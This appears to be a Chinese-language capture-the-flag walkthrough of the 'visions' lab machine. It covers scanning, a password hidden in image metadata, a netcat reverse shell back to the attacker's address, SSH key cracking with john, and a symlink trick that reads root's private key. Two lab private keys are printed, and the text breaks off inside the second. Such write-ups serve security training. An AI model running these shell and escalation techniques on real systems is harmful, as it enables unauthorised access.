![\"image-20240424123407793\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241737431.png\")
<\/div>\n
![\"image-20240424150210442\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241737433.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ rustscan -a 192.168.0.168 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.168:22\nOpen 192.168.0.168:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-24 03:02 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nInitiating Ping Scan at 03:02\nScanning 192.168.0.168 [2 ports]\nCompleted Ping Scan at 03:02, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 03:02\nCompleted Parallel DNS resolution of 1 host. at 03:02, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 03:02\nScanning visions (192.168.0.168) [2 ports]\nDiscovered open port 80\/tcp on 192.168.0.168\nDiscovered open port 22\/tcp on 192.168.0.168\nCompleted Connect Scan at 03:02, 0.00s elapsed (2 total ports)\nInitiating Service scan at 03:02\nScanning 2 services on visions (192.168.0.168)\nCompleted Service scan at 03:02, 6.08s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.168.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.21s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNmap scan report for visions (192.168.0.168)\nHost is up, received syn-ack (0.00046s latency).\nScanned at 2024-04-24 03:02:34 EDT for 6s\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 85:d0:93:ff:b6:be:e8:48:a9:2c:86:4c:b6:84:1f:85 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyo46pXRt0tw2ynd0rsEvgyTECanjcW6Vp0gdxgMID8h9aWVoqB9fQ8YZ+IVXMlIPvuu1xXPaQm1dR9K9BRkFKrtZPn7P1X1D7wlI1NYj+zHKDC8tTLEUiSdsvFms4709PPQCU36+fvcr+Y3MceyF\/Ubmo7+XEptQyvdapbVFhmM68BTP3K5F5eLaW82\/lM7sXSjP4F6skZ5YJgHv4U0RUET13XikQvg\/KidPiaBtu\/lPjUgY9T1Hc2MHmtsjSC3qvglCIoSHD8SO1cuSv7FdFUMW+N7ouKPtyYaE6KclJs3GGWv5F7R4i7N0jewqQlN7PXQ5LzObmis\/o27m66PSd\n| 256 5d:fb:77:a5:d3:34:4c:46:96:b6:28:a2:6b:9f:74:de (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNcgLO3Sm65LdnZyrcyCdt+O4vIVjOwXFft0MKc7PHhUQjqFabj2OOO0O1a+xFaxVoaciPyeu0e9d9bQu+35l5o=\n| 256 76:3a:c5:88:89:f2:ab:82:05:80:80:f9:6c:3b:20:9d (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAJcRrAeaLaJkDa1ardJpErIeSQrQEG9S41nyrKmBXmw\n80\/tcp open http syn-ack nginx 1.14.2\n|_http-title: Site doesn't have a title (text\/html).\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.14.2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 6.99 seconds<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ curl http:\/\/192.168.0.168 \n<!-- \nOnly those that can see the invisible can do the imposible.\nYou have to be able to see what doesnt exist.\nOnly those that can see the invisible being able to see whats not there.\n-alicia -->\n..........\n <img src="white.png"><\/code><\/pre>\n\u63d0\u53d6\u6587\u4ef6\u4fe1\u606f<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ wget http:\/\/192.168.0.168\/white.png\n--2024-04-24 03:05:58-- http:\/\/192.168.0.168\/white.png\nConnecting to 192.168.0.168:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 12655 (12K) [image\/png]\nSaving to: \u2018white.png\u2019\n\nwhite.png 100%[=========================================================================>] 12.36K --.-KB\/s in 0s \n\n2024-04-24 03:05:58 (1.07 GB\/s) - \u2018white.png\u2019 saved [12655\/12655]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt white.png StegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[!] error: the file format of the file "white.png" is not supported.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ exiftool white.png \nExifTool Version Number : 12.76\nFile Name : white.png\nDirectory : .\nFile Size : 13 kB\nFile Modification Date\/Time : 2021:04:19 05:05:04-04:00\nFile Access Date\/Time : 2024:04:24 03:06:22-04:00\nFile Inode Change Date\/Time : 2024:04:24 03:05:58-04:00\nFile Permissions : -rw-r--r--\nFile Type : PNG\nFile Type Extension : png\nMIME Type : image\/png\nImage Width : 1920\nImage Height : 1080\nBit Depth : 8\nColor Type : RGB with Alpha\nCompression : Deflate\/Inflate\nFilter : Adaptive\nInterlace : Noninterlaced\nBackground Color : 255 255 255\nPixels Per Unit X : 11811\nPixels Per Unit Y : 11811\nPixel Units : meters\nModify Date : 2021:04:19 08:26:43\nComment : pw:ihaveadream\nImage Size : 1920x1080\nMegapixels : 2.1<\/code><\/pre>\n\u5f97\u5230\u5bc6\u7801\uff1aihaveadream<\/code><\/p>\n\u5c1d\u8bd5ssh\u8fde\u63a5\uff1a<\/p>\n
![\"image-20240424150757671\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u63d0\u6743<\/h2>\nNC\u8f6c\u53d1shell<\/h3>\n
\u53d1\u73b0\u7528\u6237emma<\/code>\u53ef\u4ee5\u4f7f\u7528NC\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8f6c\u53d1shell\uff01<\/p>\nalicia@visions:~$ ls -la\ntotal 20\ndrwxr-xr-x 2 alicia alicia 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 alicia alicia 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 alicia alicia 3526 Apr 19 2021 .bashrc\n-rw-r--r-- 1 alicia alicia 807 Apr 19 2021 .profile\nalicia@visions:~$ sudo -l\nMatching Defaults entries for alicia on visions:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser alicia may run the following commands on visions:\n (emma) NOPASSWD: \/usr\/bin\/nc\nalicia@visions:~$ sudo -u emma \/usr\/bin\/nc -e \/bin\/bash 192.168.143 1234\nstty: 'standard input': Inappropriate ioctl for device\nbash: line 12: ifconfig: command not found<\/code><\/pre>\n<\/div><\/p>\n\u7ee7\u7eed\u8fdb\u4e00\u6b65\u63d0\u6743\uff1a<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) emma@visions:\/home\/alicia$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for emma: \n(remote) emma@visions:\/home\/alicia$ cd ..\/emma\/\n(remote) emma@visions:\/home\/emma$ ls -la\ntotal 32\ndrwxr-xr-x 3 emma emma 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 emma emma 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 emma emma 3526 Apr 19 2021 .bashrc\ndrwxr-xr-x 3 emma emma 4096 Apr 19 2021 .local\n-rw------- 1 emma emma 20 Apr 19 2021 note.txt\n-rw-r--r-- 1 emma emma 807 Apr 19 2021 .profile\n-rw------- 1 emma emma 53 Apr 19 2021 .Xauthority\n(remote) emma@visions:\/home\/emma$ cat note.txt \nI cant help myself.\n(remote) emma@visions:\/home\/emma$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nemma:x:1000:1000:emma,,,:\/home\/emma:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nalicia:x:1001:1001:,,,:\/home\/alicia:\/bin\/bash\nsophia:x:1002:1002:,,,:\/home\/sophia:\/bin\/bash\nisabella:x:1003:1003:,,,:\/home\/isabella:\/bin\/bash\n(remote) emma@visions:\/home\/emma$ cd ..\n(remote) emma@visions:\/home$ ls -la\ntotal 24\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 .\ndrwxr-xr-x 18 root root 4096 Apr 19 2021 ..\ndrwxr-xr-x 2 alicia alicia 4096 Apr 19 2021 alicia\ndrwxr-xr-x 3 emma emma 4096 Apr 19 2021 emma\ndrwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 isabella\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 sophia\n(remote) emma@visions:\/home$ cd isabella\/\n(remote) emma@visions:\/home\/isabella$ ls -la\ntotal 28\ndrwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 isabella isabella 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 isabella isabella 3526 Apr 19 2021 .bashrc\n-rw------- 1 isabella isabella 1876 Apr 19 2021 .invisible\n-rw-r--r-- 1 isabella isabella 807 Apr 19 2021 .profile\ndrwx------ 2 isabella isabella 4096 Apr 19 2021 .ssh\n(remote) emma@visions:\/home\/isabella$ cd ..\/sophia\/\n(remote) emma@visions:\/home\/sophia$ ls -la\ntotal 32\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 sophia sophia 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 sophia sophia 3526 Apr 19 2021 .bashrc\n-rwx--x--x 1 sophia sophia 1920 Apr 19 2021 flag.sh\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .local\n-rw-r--r-- 1 sophia sophia 807 Apr 19 2021 .profile\n-rw------- 1 sophia sophia 18 Apr 19 2021 user.txt\n(remote) emma@visions:\/home\/sophia$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\n(remote) emma@visions:\/home\/sophia$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper<\/code><\/pre>\nPS\u8c03\u6574\u989c\u8272\u66f2\u7ebf\u83b7\u5f97\u7528\u6237<\/h3>\n
\u7136\u540e\u770b\u4e86\u4e00\u4e0b\u5e08\u5085\u4eec\u7684wp\uff0c\u53d1\u73b0\u662f\u8981\u5bf9\u4e4b\u524d\u90a3\u4e2a\u56fe\u7247\u8fdb\u884c\u4e8c\u6b21\u5904\u7406\u3002\u3002\u3002\u3002<\/p>\n
PS<\/code>-\u56fe\u50cf<\/code>-\u8c03\u6574<\/code>-\u66f2\u7ebf<\/code>\u6216\u8005ctrl+M<\/code><\/p>\n<\/div><\/p>\nocr\u4e00\u4e0b\uff1a<\/p>\n
sophia\/seemstobeimpossible<\/code><\/pre>\n\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n
<\/div><\/p>\ncat\u63d0\u6743isabella<\/h3>\nsophia@visions:~$ ls -la\ntotal 32\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 sophia sophia 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 sophia sophia 3526 Apr 19 2021 .bashrc\n-rwx--x--x 1 sophia sophia 1920 Apr 19 2021 flag.sh\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .local\n-rw-r--r-- 1 sophia sophia 807 Apr 19 2021 .profile\n-rw------- 1 sophia sophia 18 Apr 19 2021 user.txt\nsophia@visions:~$ cat flag.sh \n#!\/bin\/bash\necho '\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m' \n\necho "-------------------------"\necho "\\nPWNED HOST: $(hostname)"\necho "\\nPWNED DATE: $(date)"\necho "\\nWHOAMI: $(id)"\necho "\\nFLAG: $(cat root.txt 2>\/dev\/null || cat user.txt 2>\/dev\/null || echo "Keep trying.")"\necho "\\n------------------------"\nsophia@visions:~$ .\/flag.sh \n\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m\n-------------------------\n\\nPWNED HOST: visions\n\\nPWNED DATE: Wed 24 Apr 2024 03:28:06 AM EDT\n\\nWHOAMI: uid=1002(sophia) gid=1002(sophia) groups=1002(sophia)\n\\nFLAG: hmvicanseeforever\n\\n------------------------\nsophia@visions:~$ cat user.txt\nhmvicanseeforever\nsophia@visions:~$ sudo -l\nMatching Defaults entries for sophia on visions:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sophia may run the following commands on visions:\n (ALL : ALL) NOPASSWD: \/usr\/bin\/cat \/home\/isabella\/.invisible\nsophia@visions:~$ ls -l \/home\/isabella\/.invisible\n-rw------- 1 isabella isabella 1876 Apr 19 2021 \/home\/isabella\/.invisible\nsophia@visions:~$ sudo -u isabella \/usr\/bin\/cat \/home\/isabella\/.invisible\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBMekPa3i\n1sMQAToGnurcIWAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDNAxlJldzm\nIgVNFXbjg51CS4YEuIxM5gQxjafNJ\/rzYw0sOPkT9sL6dYasQcOHX1SYxk5E+qD8QNZQPZ\nGfACdWDLwOcI4LLME0BOjARwmrpU4mJXwugX4+RbGICFMgY8ZYtKXEIoF8dwKPVsBdoIwi\nlgHyfJD4LwkqfV6mvlau+XRZZBhvlNP10F0SAAZqBaA9y7hRWJO\/XcCZC6HzJKzloAL2Xw\nGvAMzgtPH\/wj06NoOFjmVGMfmmHzCwgc+fLOeXXYzFeRNPH3cVExc+BnB8Ju6CFa6n7VBV\nHLCYJ3CcgKnxv6OwVtkoDi0UEFUOefELQV7fZ+g1sZt\/+2XPsmcZAAAD0E8RIvVF4XlKJq\nINtHdJ5QJZCuq2ufynbPNiHF53PqSlmC\/\/OkQZMWgJ5DcbzMJ92IqxRgjilZZUOUbE\/SFI\nPViwmpRWIGAhlyoPXyV513ukhb4UngYlgCP9qC4Rbn+Tp9Fv7lnAoD0DsmwITM2e\/Z65AD\n\/i\/BqrJ6scNEN0q+qNr3zOVljMZx+qy8cbuDn9Tbq2\/N+mcoEysfjfOaoJIgVJnLx1XE6r\n+Y9UcRyPAYs+5TB1Nz\/fpnBo7vesOu5XLUqCBCphFGmdMCdSGYZAweitjQ+Mq36hQmCtSs\nDwcbjg8vy5LJ+mtJXA7QhqgAfXWnLLny4NeCztUnTG0NLjbLR6M5e+HSsi2EqDYoGNpWld\nl4YzVPQoFMIaUJOGTc+VfkMWbQhzpiu66\/Du8dwhC+p6QSmwhV\/M70eWaH2ZVjK3MThg9K\nCVugFsLxioqlp\/rnE1oq7apTBX6FOjwz0ne+ytTVOQrHuPTs2QL4PlCvhPRoIuqydleFs4\nrdtzE6b46PexXlupewywiO5AVzbfSRAlCYwiwV42xGpYsNcKhdUY+Q9d9i9yudjIFoicrA\nMG9hxr7\/DJqEY311kTglDEHqQB3faErYsYPiOL9TTZWnPLZhClrPbiWST5tmMWxgNE\/AKY\nR7mKGDBOMFPlBAjGuKqR6zk5DEc3RzJnvGjUlaT3zzdVmxD8SpWtjzS6xHaSw\/WOvB0lsg\nDhf+Gc7OWyHm2qk+OMK9t0\/lbIDfn3su0EHwbPjYTT3xk7CtG4AwiSqPve1t9bOdzD9w9r\nTM7am\/2i\/BV1uv28823pCuYZmNG7hu5InzNC\/3iTROraE31Qqe3JCNwxVDcHqb8s6gTN+J\nq6OyZdvNNiVQUo1l7hNUlg4he4q1kTwoyAATa0hPKVxEFEISRtaQln5Ni8V+fos8GTqgAr\nHH2LpFa4qZKTtUEU0f54ixjFL7Lkz6owbUG7Cy+LuGDI1aKJRGCZwd5LkStcF\/MAO3pulc\nMsHiYwmXT3lNHhkAd1h05N2yBzXaH+M3sX6IpNtq+gi+9F443Enk7FBRFLzxdJ+UT40f6E\n+gyA2nBGygNhvQHXcu36A8BoE+IF7YVpdfDmYJffbTujtBUj2vrdsqVvtGUxf0vj9\/Sv+J\nHN9Yk2giXN8VX7qhcyLzUktmdfgd6JNAx+\/P7Kh3HV5oWk1Da+VJS+wtCg\/oEVSVyrEOpe\nskV8zcwd+ErNODEHTUbD\/nDARX8GeV158RMtRdZ5CJZSFjBz2oPDPDVpZMFNhENAAwPnrJ\nKD\/C2J6CKylbopifizfpEkmVqJRms=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u8be5\u5bc6\u94a5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ vim id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ ssh isabella@192.168.0.168 -i id_rsa\nEnter passphrase for key 'id_rsa': <\/code><\/pre>\n\u53d1\u73b0\u9700\u8981\u5bc6\u7801\uff0c\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 2 for all loaded hashes\nCost 2 (iteration count) is 16 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\ninvisible (id_rsa) \n1g 0:00:15:28 DONE (2024-04-24 04:09) 0.001077g\/s 12.15p\/s 12.15c\/s 12.15C\/s merda..gunner1\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u5f97\u5230\u5bc6\u7801\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\ncat+\u52a8\u6001\u94fe\u63a5\u63d0\u6743<\/h3>\n
\u7136\u540e\u5c1d\u8bd5\u5220\u9664\u539f\u6765\u7684\u76ee\u5f55\u6dfb\u52a0\u52a8\u6001\u94fe\u63a5\u5230root\u7684\u5bc6\u94a5\uff0c\u518d\u5207\u6362\u56de\u53bb\u8bfb\u53d6flag\uff01\uff01\uff01<\/p>\n
isabella@visions:~$ sudo -l\nMatching Defaults entries for isabella on visions:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser isabella may run the following commands on visions:\n (emma) NOPASSWD: \/usr\/bin\/man\nisabella@visions:~$ ls -la\ntotal 28\ndrwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 isabella isabella 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 isabella isabella 3526 Apr 19 2021 .bashrc\n-rw------- 1 isabella isabella 1876 Apr 19 2021 .invisible\n-rw-r--r-- 1 isabella isabella 807 Apr 19 2021 .profile\ndrwx------ 2 isabella isabella 4096 Apr 19 2021 .ssh\nisabella@visions:~$ rm -rf .\/.invisible\nisabella@visions:~$ ln -s \/root\/.ssh\/id_rsa .\/.invisible\nisabella@visions:~$ su sophia\nPassword: \nsophia@visions:\/home\/isabella$ sudo -l\nMatching Defaults entries for sophia on visions:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sophia may run the following commands on visions:\n (ALL : ALL) NOPASSWD: \/usr\/bin\/cat \/home\/isabella\/.invisible\nsophia@visions:\/home\/isabella$ sudo -u root \/usr\/bin\/cat \/home\/isabella\/.invisible\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAyezVs6KCQ\/KFWpEkzDWX3ns\/X4lUnh6PnNC2IVg3ciVgLcWF\/\/wb\nvlQxI+juYu5qTKVEL1FhkNaas+MlQUxabzOv+SDnCck60BLQbZf46sYHQaTrDyu5zhIWWi\nwgPjmic\/Ykd2qIQyIpyy9Ru4DiVK4RWLZWM28kb6eB99JTt4GSVEhraJ08hKsgaOi+skNg\nS4QG85kG4ghmA1yJpPwzzpIdG4HUic63OXgy+z+pVB5oIEp0YXrCKMN\/lBngZjZb9\/+0S1\nljKzdcq7m1TOQ1Y04YJNMrxvPJ75d8U5s+m6cRxx5F3dX7oTVmErEAxFmJjdWVChzh81Ca\nOnicNjHgrQAAA8hmM8ISZjPCEgAAAAdzc2gtcnNhAAABAQDJ7NWzooJD8oVakSTMNZfeez\n9fiVSeHo+c0LYhWDdyJWAtxYX\/\/Bu+VDEj6O5i7mpMpUQvUWGQ1pqz4yVBTFpvM6\/5IOcJ\nyTrQEtBtl\/jqxgdBpOsPK7nOEhZaLCA+OaJz9iR3aohDIinLL1G7gOJUrhFYtlYzbyRvp4\nH30lO3gZJUSGtonTyEqyBo6L6yQ2BLhAbzmQbiCGYDXImk\/DPOkh0bgdSJzrc5eDL7P6lU\nHmggSnRhesIow3+UGeBmNlv3\/7RLWWMrN1yrubVM5DVjThgk0yvG88nvl3xTmz6bpxHHHk\nXd1fuhNWYSsQDEWYmN1ZUKHOHzUJo6eJw2MeCtAAAAAwEAAQAAAQEAiCmVXYHLN8h1VkIj\nvzSwiU0wydqQXeOb0hIHjuqu0OEVPyhAGQNHLgwV6vIqtjmxIqgbF5FYKlQclAsq1yKGpR\nAErQkb4sR4TVEyjYR6TM5mnER6YYuJysT1n667u1ogCvRDWOdUpXiHGEV7ZuYdOR78AYdL\nD3n15vjcsmF5JHcftHOxnXraX7JqGXNCoRsMLT\/yUOl02ClHsjFql1NTI\/Br0GA4xhM\/16\nRHoRu1itOlWoyF4XSpSUDHW0RVQ\/0gm\/GyAc9QF6EWZXHfMfW07JvkeQLlndVbnItQ9a3v\nICAAh6zOZWVXpbhCPjjfaWTnwHhhSE3vfxMQQNTJnEghnQAAAIEAjAEzb6Xp6VV1RRaJR3\n\/Gxo0BRIbPJXdRXpDI3NO4Nvtzv8fX3muV\/i+dgYPNqa7cwheSJZX9S7RzXsZTZn1Ywbdw\nahYTVyE9B4Nsen5gekylb59tNwPpCR8sJo6ZIL1GpmkEug+r+0YZyqpZXpG5uhCaSLX1fP\n3UnkgqiKuzpvQAAACBAOOlQPW6pWXvULDsiUkilMXY0SNYLupMHJuqnWTuufyNfRthPQF2\ngfWwXRjfDmzFoM9vVxJKKSd40696qbmTNnu7I4KyvXkF0OQ3IXIelQIiIcDpDbYd17g47J\nIC6dHIQmUib3+whjeTvA5cc21y0EGNHoeNrlknE03dZHaIyfdPAAAAgQDjE3TE17PMEnd\/\nvzau9bBYZaoRt+eYmvXFrkU\/UdRwqjS\/LPWxwmpLOASW9x3bH\/aiqNGBKeSe2k4C7MWWD5\ntllkIbNEJNDtqQNt2NRvhDUOzAxca1C\/IySuwoCAvoym5cpZ\/\/EQ\/OvWyZRwk3enReVmmd\nx